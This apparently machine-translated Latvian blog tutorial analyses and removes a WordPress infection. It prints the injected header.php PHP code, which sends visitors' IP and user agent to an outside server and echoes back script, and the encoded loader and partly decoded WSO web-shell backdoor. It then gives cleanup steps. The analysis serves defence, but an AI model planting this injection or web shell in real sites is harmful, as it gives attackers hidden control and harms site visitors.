Izņemt WordPress PHP Virus

Šajā apmācībā ir parādīts īpašs gadījums, kad emuārs WordPress tas bija inficēts. Noņemšana WordPress PHP vīruss.

Citu dienu es pamanīju aizdomīgu kodu, kas, šķiet, ir PHP vīruss WordPress. Šis PHP kods bija atrodams header.php, pirms rindas </head>.

<?php $wp_rssh = 'http'; $wp_gt = 'web'; error_reporting(0); ini_set('display_errors',0); $wp_uagent = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Firefox|MSIE/i', $wp_uagent) && preg_match ('/ NT/i', $wp_uagent))){
$wp_gturl=$wp_rssh."://".$wp_gt.$wp_rssh."s.com/".$wp_gt."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_uagent);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_gturl);
curl_setopt ($ch, CURLOPT_TIMEOUT, 10); $wp_cntnt = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_cntnt,1,3) === 'scr' ){ echo $wp_cntnt; } ?>

Šis ir PHP kods, kas, šķiet, mēģina izgūt resursa saturu no ārēja servera, taču daļa, kas attiecas uz URL, ir nepilnīga.

Darba mehānisms ir nedaudz sarežģītāks un to dara WordPress PHP vīruss nav redzams ietekmēto vietņu apmeklētājiem. Tā vietā tā ir vērsta uz meklētājprogrammām (Google) un netieši izraisa ievērojamu ietekmēto vietņu apmeklētāju skaita samazināšanos.

Sīkāka informācija par ļaunprātīgu programmatūru WordPress PHP Virus

1. Iepriekš minētais kods ir atrodams header.php.

2. Serverī parādījās fails wp-log.php mapē wp-includes.

3. wp-log.php satur šifrētu kodu, taču to ir salīdzinoši viegli atšifrēt.

<?php eval(gzinflate(base64_decode('7b1rd../Fw=='))) ?>

Atšifrēt ļaunprātīgas programmatūras kodu no wp-log.php :

<?php
$auth_pass = "md5password";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
#+Dump Columns ////Boolean
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler" );
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}

@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5');

if(get_magic_quotes_gpc()) {
    function WSOstripslashes($array) {
        return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
    }
    $_POST = WSOstripslashes($_POST);
    $_COOKIE = WSOstripslashes($_COOKIE);
}

function wsoLogin() {
    die("
<pre align=center-->

<form method="post"><input name="pass" type="password" /><input type="submit" value="" /></form>" );
}

function WSOsetcookie($k, $v) {
$_COOKIE[$k] = $v;
setcookie($k, $v);
}

if(!empty($auth_pass)) {
if(isset($_POST['pass']) &amp;&amp; (md5($_POST['pass']) == $auth_pass))
WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);

if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
wsoLogin();
}

if(strtolower(substr(PHP_OS,0,3)) == "win" )
$os = 'win';
else
$os = 'nix';

$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
error_reporting(0);

$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if(isset($_POST['c']))
@chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/')
$cwd .= '/';
?>

Šķiet, ka tas ir ļaunprātīgs PHP skripts, kas satur kodu, lai apstrādātu autentifikāciju un darbības ar failiem un direktorijiem serverī. Ļoti viegli var redzēt, ka šajā skriptā ir tādi mainīgie kā $auth_pass (autentifikācijas parole), $default_action (noklusējuma darbība), $default_use_ajax (pēc noklusējuma izmantojot Ajax) un $default_charset (noklusējuma rakstzīmju iestatījums).

Acīmredzot šim skriptam ir sadaļa, kas pārbauda HTTP lietotāju aģentus, lai bloķētu piekļuvi noteiktiem tīmekļa robotiem, piemēram, meklētājprogrammām. Tajā ir arī sadaļa, kas pārbauda PHP drošības režīmu un nosaka noteiktus darba direktorijus.

4. Ja pārlūkprogrammā tiek piekļūts failam wp-log.php, tiek parādīta tīmekļa lapa ar lauku login. No pirmā acu uzmetiena šķiet, ka tas ir failu pārvaldnieks, caur kuru jaunus failus var viegli augšupielādēt mērķa serverī.

Kā devīrusi vietni WordPress?

Manuālais vīrusu noņemšanas process vienmēr ietver ievainojamības atklāšanu un izpratni.

1. Izveidojiet dublējumu visai vietnei. Tam jāietver gan faili, gan datu bāze.

2. Nosakiet aptuveni vīrusa pastāvēšanas laiku un aptuvenā laika posmā meklējiet tīmekļa serverī modificētus vai jaunizveidotus failus.

Piemēram, ja vēlaties redzēt failus .php izveidots vai pārveidots pēdējā nedēļā, palaidiet komandu serverī:

find /your/web/path -type f -mtime -7 -exec ls -l {} \; | grep "\.php$"

Tā ir vienkārša metode, ar kuras palīdzību jūs varat atklāt failus WordPress inficēti un tie, kas satur ļaunprātīgas programmatūras kodu.

3. Pārbaudiet failu .htaccess aizdomīgu direktīvu. Atļauju rindas vai skripta izpilde.

4. Pārbaudiet datu bāzi. Pilnīgi iespējams, ka dažas ziņas un lapas WordPress rediģēt ar ļaunprātīgu programmatūru vai pievienot jaunas utilizatori cu rol de administrator.

5. Pārbaudiet mapju un failu rakstīšanas atļaujas. chmod si chown.

Ieteicamās atļaujas ir: 644 failiem un 755 direktorijiem.

find /web/root/public/ -type f -exec chmod 644 {} \;
find /web/root/public/ -type d -exec chmod 755 {} \;

6. Atjaunināt visu WordPress Plugins / WordPress Themes.

Saistītie: Fix Redirect WordPress Hack 2023 (Virus Redirect)

Šīs ir "pamata" metodes, ar kurām varat devīrusēt vietni / emuāru WordPress. Ja rodas problēmas un nepieciešama palīdzība, ir atvērta komentāru sadaļa.

Tehnoloģijas entuziasts, ar prieku rakstu vietnē StealthSettings.com no 2006. gada. Man ir plaša pieredze operētājsistēmās: macOS, Windows un Linux, kā arī programmēšanas valodās un blogošanas platformās (WordPress) un tiešsaistes veikalu platformās (WooCommerce, Magento, PrestaShop).

Leave a Comment